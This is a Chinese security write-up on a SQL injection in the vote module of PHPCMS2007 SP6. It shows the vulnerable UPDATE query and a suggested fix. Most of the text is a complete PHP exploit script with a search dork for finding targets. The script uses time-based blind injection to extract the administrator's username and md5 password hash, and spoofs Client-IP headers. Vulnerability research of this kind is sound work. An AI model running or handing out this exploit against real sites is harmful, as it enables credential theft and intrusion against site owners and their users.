
PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

摘要：vote/vote.php 第 22 行 `$optionids = is_array($op) ? implode(',',$op) : $op;` 把请求参数 $op 既不做整数转换也不加引号，直接拼进 `UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids)`，构成 SQL 注入。（原帖日期标注为 08-10-08。）

漏洞代码:

vote/vote.php

// 22行
// Collapse the submitted option id(s) into the comma list the UPDATE below
// interpolates: an array becomes "1,2,3", a scalar is passed through as-is.
// ($op presumably holds the posted `op` parameter — the excerpt omits the
// assignment.) No integer cast and no quoting happens here, which is the
// root of the injection: `op=1)/**/and/**/...#` lands verbatim in the SQL.
if (is_array($op)) {
    $optionids = implode(',', $op);
} else {
    $optionids = $op;
}
...
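// VULNERABLE (kept as published, this is the listing the article is about):
// $optionids is interpolated unquoted into the IN (...) list, so a value such as
// `999999)/**/and/**/<expr>#` rewrites the statement; vote.php does not echo
// query results, hence the time-based (BENCHMARK) blind probes in the PoC below.
// Fix direction: cast each id with (int)/intval() before implode(), or bind the
// ids through a prepared statement — never string-build the IN list from input.
$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");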

漏洞很明显：$op 既未做整数转换也未加引号就被拼进 IN (...) 列表，提交 `op=999999)/**/and/**/...#` 即可改写整条 UPDATE 语句；程序其他地方也有类似的拼接写法，有兴趣的同学可以跟一下。修复思路是对每个 id 做 intval/(int) 强制转换后再 implode，或改用预处理语句绑定参数。下面给一个 PoC 性质的 exp：由于 UPDATE 不回显数据，只能借 BENCHMARK() 做基于时间的盲注逐字节猜解，速度慢且受网络抖动影响，效果不是很好 :p
代码:

#!/usr/bin/php
<?php

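print_r('
---------------------------------------------------------------------------
phpcms 2007 sp6 bind sql injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "powered by phpcms 2007"
---------------------------------------------------------------------------
');
/**
 * Historical (2008) PoC for the vote/vote.php injection: recovers the table prefix
 * from an echoed SQL error, then the first groupid=1 member's md5 password and
 * username one byte at a time via BENCHMARK()-induced delays. Only run against
 * systems you are authorised to test — every probe burns CPU on the target's DB.
 *
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
---------------------------------------------------------------------------
usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to phpcms
example:
php '.$argv[0].' localhost /phpcms/
---------------------------------------------------------------------------
');
    exit;
}

error_reporting(7); // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

// BENCHMARK() iteration count used as the "true" signal, and the round-trip delay
// (seconds) above which a probe counts as true. Both are tuning knobs: too small a
// $benchmark or too large a $timeout turns true answers into misses, and the 1 s
// resolution of time() adds jitter on top of network latency.
$benchmark = 100000000;
$timeout = 10;

// Step 1: table-prefix discovery. `ryat` is not a column, so the server's SQL
// error (echoed in the response) names the real table, e.g. "phpcms_vote_option".
$cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/ryat#';
$resp = send();
preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre);

if ($pre) {
    echo "plz waiting...\n";
    /**
     * Step 2: get admin password. It is a 32-char md5 hex string, so only NUL
     * and [0-9a-f] are tried per position (19 probes instead of 256).
     */
    $j = 1;
    $pass = '';
    $hash = array_merge(array(0), range(48, 57), range(97, 102));

    while (strlen($pass) < 32) {
        $found = false;
        for ($i = 0; $i <= 255; $i++) {
            if (!in_array($i, $hash, true)) {
                continue;
            }
            $cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/(if((ascii(substring((select/**/password/**/from/**/'.$pre[1].'_member/**/where/**/groupid=1/**/limit/**/1),'.$j.',1))='.$i.'),benchmark('.$benchmark.',char(0)),1))#';
            // Each probe is sent twice and only the second is timed — presumably
            // to let any first-hit cost settle before measuring; verify if tuning.
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            if ($endtime - $starttime > $timeout) {
                $pass .= chr($i);
                echo chr($i);
                $found = true;
                break;
            }
        }
        // No candidate produced a delay: bail out instead of retrying the same
        // position forever (the for loop leaves $i at 256, so an `$i == 255`
        // test after it never fires).
        if (!$found) {
            exit("\nexploit failed!\n");
        }
        $j++;
    }
    echo "\t";
    /**
     * Step 3: get admin username, byte by byte. substring() past the end yields
     * '' and ascii('') is 0 in MySQL, so a matched NUL byte marks the end.
     */
    $j = 1;
    $user = '';

    while (strstr($user, chr(0)) === false) {
        $found = false;
        for ($i = 0; $i <= 255; $i++) {
            $cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/(if((ascii(substring((select/**/username/**/from/**/'.$pre[1].'_member/**/where/**/groupid=1/**/limit/**/1),'.$j.',1))='.$i.'),benchmark('.$benchmark.',char(0)),1))#';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            if ($endtime - $starttime > $timeout) {
                $user .= chr($i);
                echo chr($i);
                $found = true;
                break;
            }
        }
        if (!$found) {
            exit("\nexploit failed!\n");
        }
        $j++;
    }

    exit("exploit success!\nadmin:\t$user\npassword(md5):\t$pass\n");
} else {
    // No "<prefix>_vote_option" in the response: the target is not vulnerable,
    // errors are not echoed, or the path is wrong.
    exit("exploit failed!\n");
}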

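/**
 * POST the current $cmd body to <path>vote/vote.php on $host:80 and return the
 * raw HTTP response (headers + body) as a string, or '' if the connection fails.
 *
 * Reads $host, $path and $cmd from the script's globals; the port is fixed to 80.
 * "Connection: close" makes the server end the stream, which is what terminates
 * the feof() loop — with keep-alive this would block. The timed probes rely on
 * this call blocking for the whole response, so no stream timeout is set.
 */
function send()
{
    global $host, $path, $cmd;

    $message = "POST ".$path."vote/vote.php HTTP/1.1\r\n";
    $message .= "accept: */*\r\n";
    $message .= "accept-language: zh-cn\r\n";
    $message .= "content-type: application/x-www-form-urlencoded\r\n";
    $message .= "user-agent: mozilla/4.0 (compatible; msie 6.00; windows nt 5.1; sv1)\r\n";
    // A fresh Client-IP per request — presumably to vary whatever per-IP check the
    // vote module applies to repeat submissions; confirm against vote.php.
    $message .= "client-ip: ".time()."\r\n";
    $message .= "host: $host\r\n";
    $message .= "content-length: ".strlen($cmd)."\r\n";
    $message .= "connection: close\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80, $errno, $errstr);
    if ($fp === false) {
        // Unreachable host: return an empty response rather than writing to a
        // bool (warning on old PHP, fatal TypeError on PHP 8).
        return '';
    }
    fwrite($fp, $message);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);

    return $resp;
}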

?>